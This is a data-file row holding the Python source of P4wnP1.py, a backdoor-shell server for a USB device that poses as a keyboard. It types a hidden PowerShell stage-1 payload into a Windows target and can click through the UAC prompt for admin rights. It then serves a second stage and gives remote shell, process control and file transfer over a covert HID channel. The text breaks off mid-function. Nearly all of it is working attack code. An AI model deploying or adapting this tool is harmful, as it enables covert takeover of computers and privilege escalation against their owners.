source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
P4wnP1.py | #!/usr/bin/python
# This file is part of P4wnP1.
#
# Copyright (c) 2017, Marcus Mengs.
#
# P4wnP1 is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# P4wnP1 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with P4wnP1. If not, see <http://www.gnu.org/licenses/>.
import time
import cmd
import sys
import os
import Queue
import struct
from pydispatch import dispatcher
from LinkLayer import LinkLayer
from TransportLayer import TransportLayer
from threading import Thread, Condition, Event
#from BlockingQueue import BlockingQueue
from DuckEncoder import DuckEncoder
from Config import Config
from StageHelper import StageHelper
from StructHelper import StructHelper
from Channel import *
from Client import *
from FileSystem import *
from mouse.MouseScriptParser import MouseScriptParser
class P4wnP1(cmd.Cmd):
"""
Maybe this is the class implementing P4wnP1 HID channel user prompt
... maybe not, who knows ?!
"""
DEBUG = False
CLIENT_TIMEOUT_MS = 1000 # if this value is reached, the client is regarded as disconnected
# message types from CLIENT (powershell) to server (python)
CTRL_MSG_FROM_CLIENT_RESERVED = 0
CTRL_MSG_FROM_CLIENT_REQ_STAGE2 = 1
CTRL_MSG_FROM_CLIENT_RCVD_STAGE2 = 2
CTRL_MSG_FROM_CLIENT_STAGE2_RUNNING = 3
CTRL_MSG_FROM_CLIENT_RUN_METHOD_RESPONSE = 4 # response from a method ran on client
#CTRL_MSG_FROM_CLIENT_ADD_CHANNEL = 5
CTRL_MSG_FROM_CLIENT_RUN_METHOD = 6 # client tasks server to run a method
CTRL_MSG_FROM_CLIENT_DESTROY_RESPONSE = 7
CTRL_MSG_FROM_CLIENT_PROCESS_EXITED = 8
CTRL_MSG_FROM_CLIENT_CHANNEL_SHOULD_CLOSE = 9
CTRL_MSG_FROM_CLIENT_CHANNEL_CLOSED = 10
# message types from server (python) to client (powershell)
CTRL_MSG_FROM_SERVER_STAGE2_RESPONSE = 1000
#CTRL_MSG_FROM_SERVER_SEND_OS_INFO = 1001
#CTRL_MSG_FROM_SERVER_SEND_PS_VERSION = 1002
CTRL_MSG_FROM_SERVER_RUN_METHOD = 1003 # server tasks client to run a method
#CTRL_MSG_FROM_SERVER_ADD_CHANNEL_RESPONSE = 1004
CTRL_MSG_FROM_SERVER_RUN_METHOD_RESPONSE = 1005 # response from a method ran on server
CTRL_MSG_FROM_SERVER_DESTROY = 1006 # response from a method ran on server
CTRL_MSG_FROM_SERVER_CLOSE_CHANNEL = 1007
def __init__(self, linklayer, transportlayer, config, stage2 = "", duckencoder = None):
# state value to inform sub threads of running state
self.running = False
self.stage2=stage2
self.config = config
self.client = Client() # object to monitor state of remote client
self.client.registerCallbackOnConnectChange(self.onClientConnectStateChange)
#self.control_sysinfo_response = BlockingQueue("CONTROL_SERVER_SYSINFO_RESPONSE")
self.server_thread_in = Thread(target = self.__input_handler, name = "P4wnP1 Server Input Loop", args = ( ))
self.server_thread_out = Thread(target = self.__output_handler, name = "P4wnP1 Server Output Loop", args = ( ))
self._next_client_method_id = 1
self.tl = transportlayer
self.ll = linklayer
self.__pending_server_methods = {}
self.duckencoder = duckencoder
self.mousescriptparser = MouseScriptParser()
# register Listener for LinkLayer signals to upper layers (to receive LinkLayer connection events)
dispatcher.connect(self.signal_handler_transport_layer, sender="TransportLayerUp")
self.client_connected_commands = ["ls", "pwd", "cd", "shell", "CreateProc", "interact", "download", "upload", "echotest", "GetClientProcs", "KillClient", "KillProc"]
self.setPrompt(False, False)
cmd.Cmd.__init__(self)
self.intro = '''=================================
P4wnP1 HID backdoor shell
Author: MaMe82
Web: https://github.com/mame82/P4wnP1
State: Experimental (maybe forever ;-))
Enter "help" for help
Enter "FireStage1" to run stage 1 against the current target.
Use "help FireStage1" to get more details.
=================================
'''
def precmd(self, line):
cmd, args, remain = self.parseline(line)
if not cmd:
return line
if cmd in self.client_connected_commands:
if not self.client.isConnected():
print ""
print "Command '{0}' could only be called with a client connected.".format(cmd)
print "--------------------------------------------------------------"
print ""
print "Use 'SetKeyboardLanguage' to switch to your targtes keyboard"
print "layout and run 'FireStage1' to connect via HID covert channel."
print "--------------------------------------------------------------"
print ""
return ""
return line
def setPrompt(self, connectState, reprint = True):
if connectState:
self.prompt = "P4wnP1 shell (client connected) > "
else:
self.prompt = "P4wnP1 shell (client not connected) > "
if reprint:
self.print_reprompt()
def print_reprompt(self, text = ""):
if len(text) > 0:
print text
sys.stdout.write(self.prompt)
sys.stdout.flush()
@staticmethod
def print_debug(str):
if P4wnP1.DEBUG:
print "P4wnP1 Server (DEBUG): {}".format(str)
########################
# Internal methods of P4wnP1 server
##########################
def sendControlMessage(self, ctrl_message_type, payload = None):
ctrl_channel = 0
# construct header
ctrl_message = struct.pack("!II", ctrl_channel, ctrl_message_type)
# append payload
if payload:
ctrl_message += payload
self.tl.write_stream(ctrl_message)
def interactWithClientProcess(self, pid):
print "Trying to interact with process ID {0} ...".format(pid)
proc = self.client.getProcess(pid)
if not proc:
print "PID {0} not found or process not managed by P4wnP1".format(pid)
return
import select
interacting = True
proc.setInteract(True) # let the process object inform the channel that stdout and stderr should be used
while interacting:
if not self.client.isConnected():
interacting = False
print "\nClient disconnected, stop interacting"
break
if proc.hasExited:
print "\nProcess exited... stopping interaction"
if proc.keepTillInteract:
self.client.removeProc(proc.id)
break
try:
#input = getpass.getpass()
# only read key if data available in stdin(avoid blocking stdout)
if select.select([sys.stdin], [], [], 0.05)[0]: # 50 ms timeout, to keep CPU load low
input = sys.stdin.readline()
print input
proc.writeStdin(input)
except KeyboardInterrupt:
interacting = False
proc.setInteract(False)
print "\nInteraction stopped by keyboard interrupt.\nTo continue interaction use 'interact'."
#def addChannel(self, payload):
#'''
#Client requested new channel, add it...
#'''
#ch_id, ch_type, ch_encoding = struct.unpack("!IBB", payload)
#P4wnP1.print_debug("Server add channel request. Channel id '{0}', type {1}, encoding {2}".format(ch_id, ch_type, ch_encoding))
def onClientConnectStateChange(self, state):
#print "Client connect state: {0}".format(state)
if state:
print "\nTarget connected through HID covert channel\n"
else:
print "\nTarget disconnected"
self.setPrompt(state)
def onClientProcessExitted(self, payload):
# fetch proc id
proc_id = struct.unpack("!I", payload)[0]
proc = self.client.getProcess(proc_id)
if proc:
proc.hasExited = True
self.print_reprompt("Proc with id {0} exited".format(proc_id))
if not proc.keepTillInteract:
self.client.removeProc(proc_id)
def get_next_method_id(self):
next = self._next_client_method_id
# increase next_method id and cap to 0xFFFFFFFF
self._next_client_method_id = (self._next_client_method_id + 1) & 0xFFFFFFFF
return next
def start(self):
# start LinkLayer Threads
print "Starting P4wnP1 server..."
self.ll.start_background()
self.running = True
self.server_thread_in.start()
P4wnP1.print_debug("Server input thread started.")
self.server_thread_out.start()
P4wnP1.print_debug("Server output thread started.")
def stop(self):
self.running = False
def set_stage2(self, stage2_str):
self.stage2 = stage2_str
def __output_handler(self):
while self.running:
pending_methods = self.client.getPendingMethods()
for method_id in pending_methods.keys():
try:
method = pending_methods[method_id]
except KeyError:
# the method was removed, because it finished execution meanwhile
P4wnP1.print_debug("Output for the pending method with ID {0} couldn't be processed, method doesn't exist.")
# check if method run has already been requested from client, do it if not
if not method.run_requested:
# request method run
method_request = method.createMethodRequest()
self.sendControlMessage(P4wnP1.CTRL_MSG_FROM_SERVER_RUN_METHOD, method_request)
# mark the method with "run requested"
method.run_requested = True
continue # step forward to next method
P4wnP1.print_debug("Pending method name: '{0}', ID: {1}".format(method.name, method.id))
# process pending output from client channels
###############################################
pendingOut = self.client.getPendingChannelOutput()
if len(pendingOut) > 0:
# push data to transport layer
for stream in pendingOut:
self.tl.write_stream(stream)
#time.sleep(5)
#time.sleep(0.1)
def __input_handler(self):
while self.running:
# processing input data
indata = False
bytes_rcvd = 0
while self.tl.data_available():
stream = self.tl.pop_input_stream()
# deconstruct stream into channel and channel payload (network order endianess)
ch,payload = struct.unpack("!I{0}s".format(len(stream) - 4), stream)
if (ch == 0):
# control channel, extract control message type
msg_type,payload = struct.unpack("!I{0}s".format(len(payload) - 4), payload)
if msg_type == P4wnP1.CTRL_MSG_FROM_CLIENT_REQ_STAGE2:
P4wnP1.print_debug("indata: Control channel, control message STAGE2 REQUEST")
self.client.setStage2("REQUESTED")
# we send stage 2
response = struct.pack("!II{0}s".format(len(self.stage2)), 0, P4wnP1.CTRL_MSG_FROM_SERVER_STAGE2_RESPONSE, self.stage2) # send back stage 2 as string on channel 0 (control channel) ...
self.tl.write_stream(response) # ... directly to transport layer
elif msg_type == P4wnP1.CTRL_MSG_FROM_CLIENT_RCVD_STAGE2:
self.client.setStage2("RECEIVED")
elif msg_type == P4wnP1.CTRL_MSG_FROM_CLIENT_STAGE2_RUNNING:
self.client.setStage2("RUNNING")
self.client.setConnected(True)
elif msg_type == P4wnP1.CTRL_MSG_FROM_CLIENT_RUN_METHOD_RESPONSE:
# handle method response
self.client.deliverMethodResponse(payload)
#elif msg_type == P4wnP1.CTRL_MSG_FROM_SERVER_SEND_OS_INFO:
#self.client.setOSInfo(payload)
#elif msg_type == P4wnP1.CTRL_MSG_FROM_SERVER_SEND_PS_VERSION:
#self.client.setPSVersion(payload)
#elif msg_type == P4wnP1.CTRL_MSG_FROM_CLIENT_ADD_CHANNEL:
#self.addChannel(payload)
elif msg_type == P4wnP1.CTRL_MSG_FROM_CLIENT_DESTROY_RESPONSE:
self.print_reprompt("Client received terminate!")
self.client.setConnected(False)
elif msg_type == P4wnP1.CTRL_MSG_FROM_CLIENT_RUN_METHOD:
#print "Run method request with following payload received: {0} ".format(repr(payload))
pass
elif msg_type == P4wnP1.CTRL_MSG_FROM_CLIENT_PROCESS_EXITED:
self.onClientProcessExitted(payload)
elif msg_type == P4wnP1.CTRL_MSG_FROM_CLIENT_CHANNEL_SHOULD_CLOSE:
channel_id = struct.unpack("!I", payload)[0]
self.print_reprompt("Client sent channel close request for channel ID {0}, removing channel from server...".format(channel_id))
self.client.removeChannel(channel_id)
# send back request to close remote channel, too
self.sendControlMessage(P4wnP1.CTRL_MSG_FROM_SERVER_CLOSE_CHANNEL, struct.pack("!I", channel_id))
elif msg_type == P4wnP1.CTRL_MSG_FROM_CLIENT_CHANNEL_CLOSED:
channel_id = struct.unpack("!I", payload)[0]
self.print_reprompt("Client confirmed close of remote channel with ID {0}!".format(channel_id))
else:
P4wnP1.print_debug("indata: Control channel, unknown control message type: {0}, payload: {1} ".format(msg_type, repr(payload)))
else:
# as this is not a control channel, it has to be handled by the client object
#P4wnP1.print_debug("indata: for unknown channel channel {0}, payload: {1} ".format(ch, repr(payload)))
#P4wnP1.print_debug("indata: for channel channel {0}, payload: {1} ".format(ch, repr(payload)))
self.client.sendToInputChannel(ch, payload)
# loose definition, data argument has to be produced by LinkLayer
def signal_handler_transport_layer(self, signal, data):
P4wnP1.print_debug("TransportLayer signal: {0}".format(signal))
if signal == "TransportLayerClientConnectedLinkLayer":
# connection established
self.client.setLink(True)
elif signal == "TransportLayerConnectionResetLinkLayer":
#self.client.setConnected(False)
self.client.setLink(False)
elif signal == "TransportLayerConnectionTimeoutLinkLayer":
if data >= P4wnP1.CLIENT_TIMEOUT_MS:
self.print_reprompt("\nClient didn't respond for {0} seconds.".format(data/1000))
self.ll.restart_background()
self.client.setLink(False)
elif signal == "TransportLayerWaitingForClient" or signal == "TransportLayerSendStream":
# ignore these events
pass
else:
P4wnP1.print_debug("Unhandled LinkLayer signal: {0}".format(signal))
# overwrite cmd.emptyline()
def emptyline(self):
# do nothing
pass
#def handler_client_method_response(self, response):
## test handler, print response
#print "Testhandler for client method, result: " + repr(response)
def killCLient(self):
self.sendControlMessage(P4wnP1.CTRL_MSG_FROM_SERVER_DESTROY)
def stage1_trigger(self, trigger_type=1, trigger_delay_ms=1000, hideTargetWindow = True, bypassUAC = False):
'''
Triggers Stage 1 either with pure PowerShell using reflections (trigger_type = 1)
or with PowerShell invoking a .NET assembly, running stage1 (trigger_type = 2)
trigger_type 1:
Is faster, because less keys have to be printed out. As the PowerShell
isn't cpable of reading serial and manufacturer of a USB HID composite device, PID
and VID have to be prepended in front of the payload.
trigger_type 2:
Is slower, because around 6000 chars have to be printed to build the needed assembly.
There's no need to account on PID and VID, as the code is using the device serial "deadbeefdeadbeef"
and the manufacturer "MaMe82".
'''
gadget_dir = "/sys/kernel/config/usb_gadget/mame82gadget/"
ps_stub ='''
GUI r
DELAY 500
STRING powershell.exe
ENTER
'''
ps_stub += "DELAY " + str(trigger_delay_ms) + "\n"
if bypassUAC:
# confirm UAC dialog with "SHIFT+TAB, ENTER" to be language independent (no "ALT+Y")
ps_stub += '''
STRING start powershell -verb runas;exit
ENTER
DELAY 500
SHIFT TAB
DELAY 100
ENTER
'''
# use trigger delay once more
ps_stub += "DELAY " + str(trigger_delay_ms) + "\n"
ps_script = ""
if hideTargetWindow:
# move window offscreen + hide it + post request to owning window
ps_script += StageHelper.out_PS_SetWindowPos(x=-100, y=-100, cx=80, cy=80, flags=0x4000+0x80) + "\n"
#ps_script += StageHelper.out_PS_SetWindowPos(x=100, y=100, cx=80, cy=80, flags=0x4) + "\n"
if trigger_type == 1:
# read PID and VID
pid=""
with open(gadget_dir+"idProduct","r") as f:
pid=f.read()
pid=(pid[2:6]).upper()
vid=""
with open(gadget_dir+"idVendor","r") as f:
vid=f.read()
vid=(vid[2:6]).upper()
ps_script += "$USB_VID='{0}';$USB_PID='{1}';".format(vid, pid)
with open(self.config["PATH_STAGE1_PS"],"rb") as f:
ps_script += StageHelper.out_PS_IEX_Invoker(f.read())
elif trigger_type == 2:
# slower .NET dll based stage 1
ps_script += StageHelper.out_PS_Stage1_invoker(self.config["PATH_STAGE1_DOTNET"])
self.duckencoder.outhidDuckyScript(ps_stub) # print DuckyScript stub
self.duckencoder.outhidStringDirect(ps_script + ";exit\n") # print stage1 PowerShell script
###################
# caller methods and handlers for remote client methods
#####################
# CALLERS
def client_call_echo(self, echostring):
self.client.callMethod("core_echo", echostring, self.handler_client_echotest, waitForResult = True)
def client_call_get_proc_list(self, waitForResult = False):
self.client.callMethod("core_get_client_proc_list", "", self.handler_client_get_proc_list, waitForResult = waitForResult)
def client_call_create_shell_proc(self, shell="cmd.exe"):
args=""
method_args = struct.pack("!B{0}sx{1}sx".format(len(shell), len(args)), 1, shell, args) # create null terminated strings from process name and args
# we could use the create proc handler
no_error, proc = self.client.callMethod("core_create_proc", method_args, self.handler_client_create_shell_proc, waitForResult = True, deliverResult = True)
if no_error:
if proc:
self.interactWithClientProcess(proc.id)
else:
self.print_reprompt("Trying to create the process resulted in error: {0}".format(proc))
def client_call_create_proc(self, filename, args, use_channels = True, waitForResult = False):
# build arguments: [String] ProcFilename + [String] ProcArgs
use_channels_byte = 0
if use_channels:
use_channels_byte = 1
method_args = struct.pack("!B{0}sx{1}sx".format(len(filename), len(args)), use_channels_byte, filename, args) # create null terminated strings from process name and args
self.client.callMethod("core_create_proc", method_args, self.handler_client_create_proc, waitForResult = waitForResult)
def client_call_kill_proc(self, proc_id):
method_args = struct.pack("!I", proc_id)
self.client.callMethod("core_kill_proc", method_args, self.handler_client_kill_proc, waitForResult = False)
def client_call_inform_channel_added(self, channel):
self.client.callMethod("core_inform_channel_added", struct.pack("!I", channel.id), self.handler_client_inform_channel_added, waitForResult = False)
def client_call_destroy_channel(self, channel):
self.client.callMethod("core_destroy_channel", struct.pack("!I", channel.id), self.handler_client_destroy_channel, waitForResult = False)
# HANDLER
def handler_pass_through_result(self, response):
return response
def handler_client_echotest(self, response):
print response
def handler_client_get_proc_list(self, response):
print response.replace("\r\n", "\n")
def handler_client_create_shell_proc(self, response):
return self.handler_client_create_proc(response)
def handler_client_kill_proc(self, response):
#pid = struct.unpack("!I", response)[0]
#proc = self.client.getProcess(pid)
#if proc:
#self.client.removeChannel(proc.ch_stdin.id)
#self.client.removeChannel(proc.ch_stderr.id)
#self.client.removeChannel(proc.ch_stdout.id)
pass
def handler_client_create_proc(self, response):
proc_id, uses_channels, ch_stdin, ch_stdout, ch_stderr = struct.unpack("!IBIII", response)
uses_channels = bool(uses_channels) # convert bool
if uses_channels:
P4wnP1.print_debug("Process created channels, PID: {0}, CH_STDIN: {1}, CH_STDOUT: {2}, CH_STDERR: {3}".format(proc_id, ch_stdin, ch_stdout, ch_stderr))
# we keep track of the process channels in client state, thus we create and add channels
# create STDIN channel
ch_stdin = Channel(ch_stdin, Channel.TYPE_OUT, Channel.ENCODING_UTF8) # from our perspective, this is an OUT channel (IN on client)
# create STDOUT channel
ch_stdout = Channel(ch_stdout, Channel.TYPE_IN, Channel.ENCODING_UTF8) # from our perspective, this is an IN channel (OUT on client)
# create STDERR channel
ch_stderr = Channel(ch_stderr, Channel.TYPE_IN, Channel.ENCODING_UTF8) # from our perspective, this is an IN channel (OUT on client)
self.client.addChannel(ch_stdin)
self.client.addChannel(ch_stdout)
self.client.addChannel(ch_stderr)
proc = ClientProcess(proc_id, ch_stdin, ch_stdout, ch_stderr)
self.client.addProc(proc)
#self.client.callMethod("core_inform_channel_added", struct.pack("!I", ch_stdin.id), self.handler_core_inform_channel_added, waitForResult = False)
#self.client.callMethod("core_inform_channel_added", struct.pack("!I", ch_stdout.id), self.handler_core_inform_channel_added, waitForResult = False)
#self.client.callMethod("core_inform_channel_added", struct.pack("!I", ch_stderr.id), self.handler_core_inform_channel_added, waitForResult = False)
self.client_call_inform_channel_added(ch_stdin)
self.client_call_inform_channel_added(ch_stderr)
self.client_call_inform_channel_added(ch_stdout)
print "Process with ID {0} created".format(proc_id)
return proc
else:
print "Process created without channels, PID: {0}".format(proc_id)
def handler_client_inform_channel_added(self, response):
P4wnP1.print_debug("Channel added inform " + repr(response))
def handler_client_destroy_channel(self, response):
channel_id = struct.unpack("!I", response)[0]
self.client.removeChannel(channel_id)
###################
# interface methods callable from P4wnP1 console
#####################
def do_KillProc(self, line):
'''
Try to kill the given remote process
'''
try:
proc_id = int(line)
self.client_call_kill_proc(proc_id)
except ValueError:
print "{0} is not a process id".format(line)
def do_KillClient(self, line):
'''
Try to kill the remote client
'''
if not self.client.isConnected():
print "This doesn't make sense, there's no client connected"
return
self.killCLient()
def do_CreateProc(self, line):
'''
This remote Powershell method calls "core_create_proc" in order to create a remote process
The response is handled by "handler_client_core_create_proc()"
'''
if not self.client.isConnected():
print "Not possible, client not connected"
return
if " " in line:
proc_name, proc_args = line.split(" ",1)
else:
proc_name = line
proc_args = ""
self.client_call_create_proc(proc_name, proc_args, use_channels = True, waitForResult = False)
def do_GetClientProcs(self, line):
'''
Print a list of processes managed by the remote client
'''
if not self.client.isConnected():
print "Not possible, client not connected"
return
self.client_call_get_proc_list(waitForResult = True)
def do_shell(self, line):
if not self.client.isConnected():
print "Not possible... Run 'FireStage1' first, to get the target connected"
return
if "powershell" in line.lower():
self.client_call_create_shell_proc("powershell.exe")
else:
self.client_call_create_shell_proc()
#def do_run_method(self, line):
#if " " in line:
#method_name, method_args = line.split(" ",1)
#else:
#method_name = line
#method_args = ""
#self.client.callMethod(method_name, method_args, self.handler_client_method_response)
def do_SendKeys(self, line):
'''
Prints out everything on target through HID keyboard. Be sure
to set the correct keyboard language for your target (use
'GetKeyboardLanguage' and 'SetKeyboardLanguage' commands.).
'''
self.duckencoder.outhidStringDirect(line)
def do_FireStage1(self, line):
'''
usage: FireStage1 <trigger_type> <trigger_delay in milliseconds> [nohide] [uac]
Fires stage 1 via HID keyboard against a PowerShell process
on a Windows client.
The code downloads stage 2 and after successfull execution
commands like "shell" could be used, to get a remote shell
(communictaing through HID covert channel only).
THE KEYBOARD LANGUAGE HAS TO BE SET ACCORDING TO THE TARGETS
KEYBOARD LAYOUT, TO MAKE THIS WORK (use 'GetKeyboardLanguage'
and 'SetKeyboardLanguage' commands.)
trigger_type = 1 (default):
Is faster, because less keys have to be printed out. As the
PowerShell script isn't capable of reading serial and
manufacturer of a USB HID composite device, PID and VID have
to be prepended in front of the payload. This leaves a larger
footprint.
trigger_type = 2:
Is slower, because around 6000 chars have to be printed to
build the needed assembly. There's no need to account on PID
and VID, as the code is using the device serial "deadbeef
deadbeef" and the manufacturer "MaMe82". These are hardcoded
in the assembly, and leave a smaller footprint (not ad-hoc
readable, if powershell script content is logged).
trigger_delay (default 1000):
The payload is started by running powershell.exe and directly
entering the script with HID keyboard.
This part is critical, as if keystrokes get lost the initial
stage won't execute. This could be caused by user interaction
during stage 1 typeout or due to PowerShell.exe starting too
slow and thus getting ready for keyboard input too late.
The latter case could be handled by increasing the trigger delay,
to give the target host more time between start of powershell
nd start of typing out stage1.
The value defaults to 1000 ms if omitted.
nohide
If "nohide" is added, the stup hiding the powershell window on
the target is omited
uac
If "uac" is added P4wnP1 tries to run an elevated PowerShell
session homing the payload.
Caution: The target user has to be member of the "Local
Administrators" group, otherwise this would fail.
The option is disabled by default.
'''
arg_error="Wrong arguments given"
trigger_type = 1
trigger_delay_ms = 1000
args = line.split(" ")
if len(args) == 1 and len(line) > 0:
try:
trigger_type = int(args[0])
except ValueError:
print arg_error
elif len(args) == 2:
try:
trigger_type = int(args[0])
trigger_delay_ms = int(args[1])
except ValueError:
print arg_error
hideTargetWindow = True
if "nohide" in line.lower():
hideTargetWindow = False
bypassUAC = False
if "uac" in line.lower():
bypassUAC = True
print "Starting to type out stage1 to the target..."
self.stage1_trigger(trigger_type=trigger_type, trigger_delay_ms=trigger_delay_ms, hideTargetWindow = hideTargetWindow, bypassUAC=bypassUAC)
print "...done. If the client doesn't connect back, check the target"
print "keyboard layout with 'SetKeyboardLanguage'"
def do_SetKeyboardLanguage(self, line):
'''
Sets the language for target keyboard interaction.
Possible values:
be, br, ca, ch, de, dk, es, fi, fr, gb, hr, it,
no, pt, ru, si, sv, tr, us
'''
singleprint = False
if len(line) > 0:
self.duckencoder.setLanguage(line.lower())
singleprint = True
current_language = self.duckencoder.getLanguage()
# fetch possible languages
hasChosen = False
available_langs = [lang.replace(".properties", "") for lang in FileSystem.ls(self.config["PATH_LANGUAGES"]) if lang != "keyboard.properties"]
per_line = 8
langNum = 0
singleprint = False
if len(line) > 0 and line.lower() in available_langs:
self.duckencoder.setLanguage(line.lower())
singleprint = True
while not hasChosen:
# print available languages
print "Choose language by number or name:"
print "================================\n"
index = 0
for i in range(0, len(available_langs), per_line):
line = ""
for j in range(per_line):
index = i + j
if index >= len(available_langs):
break
if available_langs[index] == current_language:
line += "[{0}:{1}]\t".format(index, available_langs[index])
else:
line += "{0}:{1} \t".format(index, available_langs[index])
print line
if singleprint:
break
given = raw_input("Your selection or 'x' to abort: ")
if given == "x":
print "abort ..."
return
# try to choose by name
if given in available_langs:
langNum = available_langs.index(given)
hasChosen = True
break
# try to choose by number
try:
langNum = int(given)
if langNum >= 0 and langNum < len(available_langs):
hasChosen = True
break
else:
print "Invalid input..."
continue
except ValueError:
print "Invalid input..."
continue
if hasChosen:
print self.duckencoder.setLanguage(available_langs[langNum])
else:
return
def do_GetKeyboardLanguage(self, line):
'''
Shows which language is set for HID keyboard.
'''
print self.duckencoder.getLanguage()
def do_interact(self, line):
if not self.client.isConnected():
print "Not possible, client not connected"
return
pid = line.split(" ")[0]
if pid == "":
print "No process ID given, choose from:"
procs = self.client.getProcsWithChannel()
for p in procs:
if p.hasExited:
print "{0} (exited, interact to see final output)".format(p.id)
else:
print "{0}".format(p.id)
return
try:
pid = int(pid.strip())
except ValueError:
print "No valid process id: {0}".format(pid)
return
self.interactWithClientProcess(pid)
def do_exit(self, line):
print "Exitting..."
# self.ll.stop() # should happen in global finally statement
sys.exit()
def do_state(self, line):
self.client.print_state()
def do_echotest(self, line):
'''
If the client is connected, command arguments given should be reflected back.
Communications happen through a pure HID covert channel.
'''
self.client_call_echo(line)
def do_GetClientTimeout(self, line):
print "The client is considered disconnected, if no HID communication occures for"
print "\t{0} ms".format(P4wnP1.CLIENT_TIMEOUT_MS)
print
print "If you encounter disconnection issues (client is processing data to slow) increase"
print "this delay with `SetClientTimeout`"
def do_SetClientTimeout(self, line):
try:
val = int(line)
if val < 10 or val > 10000:
print "Timeout has to be chosenbetween 10ms and 10000ms"
return
P4wnP1.CLIENT_TIMEOUT_MS = val
except ValueError:
print "You have to provide a new timeout value in milliseconds"
def do_SendDuckyScript(self, line):
scriptpath = self.config["PATH_DUCKYSCRIPT"] + "/" + line
if not FileSystem.fileExists(scriptpath):
print "No script given or given script not found"
hasChosen = False
scriptNum = 0
available_scripts = FileSystem.ls(self.config["PATH_DUCKYSCRIPT"])
while not hasChosen:
# print out available scripts
print "Choose script by number or name:"
print "================================\n"
for i in range(len(available_scripts)):
print "{0}:\t{1}".format(i, available_scripts[i])
given = raw_input("Your selection or 'x' to abort: ")
if given == "x":
print "abort ..."
return
# try to choose by name
if given in available_scripts:
scriptNum = available_scripts.index(given)
hasChosen = True
break
# try to choose by number
try:
scriptNum = int(given)
if scriptNum >= 0 and scriptNum < len(available_scripts):
hasChosen = True
break
else:
print "Invalid input..."
continue
except ValueError:
print "Invalid input..."
continue
if hasChosen:
scriptpath = self.config["PATH_DUCKYSCRIPT"] + "/" + available_scripts[scriptNum]
else:
return
# read in script
script = ""
with open(scriptpath, "r") as f:
script = f.read()
# execute script
self.duckencoder.outhidDuckyScript(script)
def do_SendMouseScript(self, line):
scriptpath = self.config["PATH_MOUSESCRIPT"] + "/" + line
if not FileSystem.fileExists(scriptpath):
print "No script given or given script not found"
hasChosen = False
scriptNum = 0
available_scripts = FileSystem.ls(self.config["PATH_MOUSESCRIPT"])
while not hasChosen:
# print out available scripts
print "Choose script by number or name:"
print "================================\n"
for i in range(len(available_scripts)):
print "{0}:\t{1}".format(i, available_scripts[i])
given = raw_input("Your selection or 'x' to abort: ")
if given == "x":
print "abort ..."
return
# try to choose by name
if given in available_scripts:
scriptNum = available_scripts.index(given)
hasChosen = True
break
# try to choose by number
try:
scriptNum = int(given)
if scriptNum >= 0 and scriptNum < len(available_scripts):
hasChosen = True
break
else:
print "Invalid input..."
continue
except ValueError:
print "Invalid input..."
continue
if hasChosen:
scriptpath = self.config["PATH_MOUSESCRIPT"] + "/" + available_scripts[scriptNum]
else:
return
# read in script
script = ""
with open(scriptpath, "r") as f:
script = f.readlines()
# execute script
print "Executing MouseScript ..."
try:
self.mousescriptparser.executeScript(script)
except KeyboardInterrupt:
print "MouseScript execution interrupted"
return
print "... finished"
def do_lcd(self, line):
print FileSystem.cd(line)
def do_lpwd(self, line):
print FileSystem.pwd()
def do_lls(self, line):
if len(line.strip()) > 0:
res = FileSystem.ls_native2(line.split(" "))
else:
res = FileSystem.ls_native2()
for l in res:
print l
def client_call_open_file(self, remote_filename, remote_filemode, remote_fileaccess):
method_args = struct.pack("!{0}sxBB".format(len(remote_filename)), remote_filename, remote_filemode, remote_fileaccess)
# we could use the create proc handler
return self.client.callMethod("core_fs_open_file", method_args, self.handler_pass_through_result, error_handler=self.handler_pass_through_result, waitForResult = True, deliverResult = True)
def client_call_close_stream(self, stream_id):
method_args = struct.pack("!i", stream_id)
# we could use the create proc handler
return self.client.callMethod("core_fs_close_stream", method_args, self.handler_pass_through_result, error_handler=self.handler_pass_through_result, waitForResult = True, deliverResult = True)
def client_call_open_stream_channel(self, stream_id, passthrough = True):
pt = 1
if not passthrough:
pt = 0
method_args = struct.pack("!iB", stream_id, pt)
# we could use the create proc handler
return self.client.callMethod("core_open_stream_channel", method_args, self.handler_pass_through_result, error_handler=self.handler_pass_through_result, waitForResult = True, deliverResult = True)
def client_call_FS_command(self, command, command_args=""):
# remote_file_target: 0=disc, 1=in_memory
method_args = struct.pack("!{0}sx{1}sx".format(len(command), len(command_args)), command, command_args)
# we could use the create proc handler
no_err, result = self.client.callMethod("core_call_fs_command", method_args, self.handler_pass_through_result, error_handler=self.handler_pass_through_result, waitForResult = True, deliverResult = True)
result, _ = StructHelper.extractNullTerminatedString(result)
if no_err:
print result
else:
print "Remote file system error: {0}".format(result)
def do_pwd(self, line):
self.client_call_FS_command("pwd")
def do_ls(self, line):
self.client_call_FS_command("ls", line)
def do_cd(self, line):
self.client_call_FS_command("cd", line)
@staticmethod
def askYesNo(default_yes = False):
given = ""
valid = False
while not valid:
if default_yes:
given = raw_input("(y)es / (n)o, default yes: ")
if not given:
given = "y"
else:
given = raw_input("(y)es / (n)o, default no: ")
if not given:
given = "n"
if given.lower() in ["y", "yes"]:
return True
elif given.lower() in ["n", "no"]:
return False
else:
print "invalid input"
def do_upload(self, line):
args = line.split(" ")
target_path = ""
source_path = ""
if len(args) == 0 or len(line) == 0:
print "you need to provide a file source"
return
elif len(args) == 1:
source_path = args[0].strip()
target_path = FileSystem.getFileName(source_path)
elif len(args) == 2:
source_path = args[0].strip()
target_path = args[1].strip()
else:
print "wrong argument count"
return
sourcefile = None
# try to open local file first
try:
sourcefile = FileSystem.open_local_file(source_path, FileMode.Open, FileAccess.Read)
except Exception as e:
print e.message
return
# Try to open remote file
success, result = self.client_call_open_file(remote_filename = target_path,
remote_filemode = FileMode.CreateNew, # don't overwrite
remote_fileaccess = FileAccess.Write)
stream_id = -1
if success:
stream_id = struct.unpack("!i", result)[0] # signed int
print "Remote FileStream with ID '{0}' opened".format(stream_id)
print stream_id
else:
print "File open Error: {0}".format(StructHelper.extractNullTerminatedString(result)[0])
print "Seems the target file already exists, access is forbidden or the path is invalid. Do you want to force overwrite?"
overwrite = P4wnP1.askYesNo(default_yes=True)
if overwrite:
success, result = self.client_call_open_file(remote_filename = target_path,
remote_filemode = FileMode.Create, # overwrite if exists
remote_fileaccess = FileAccess.Write)
if success:
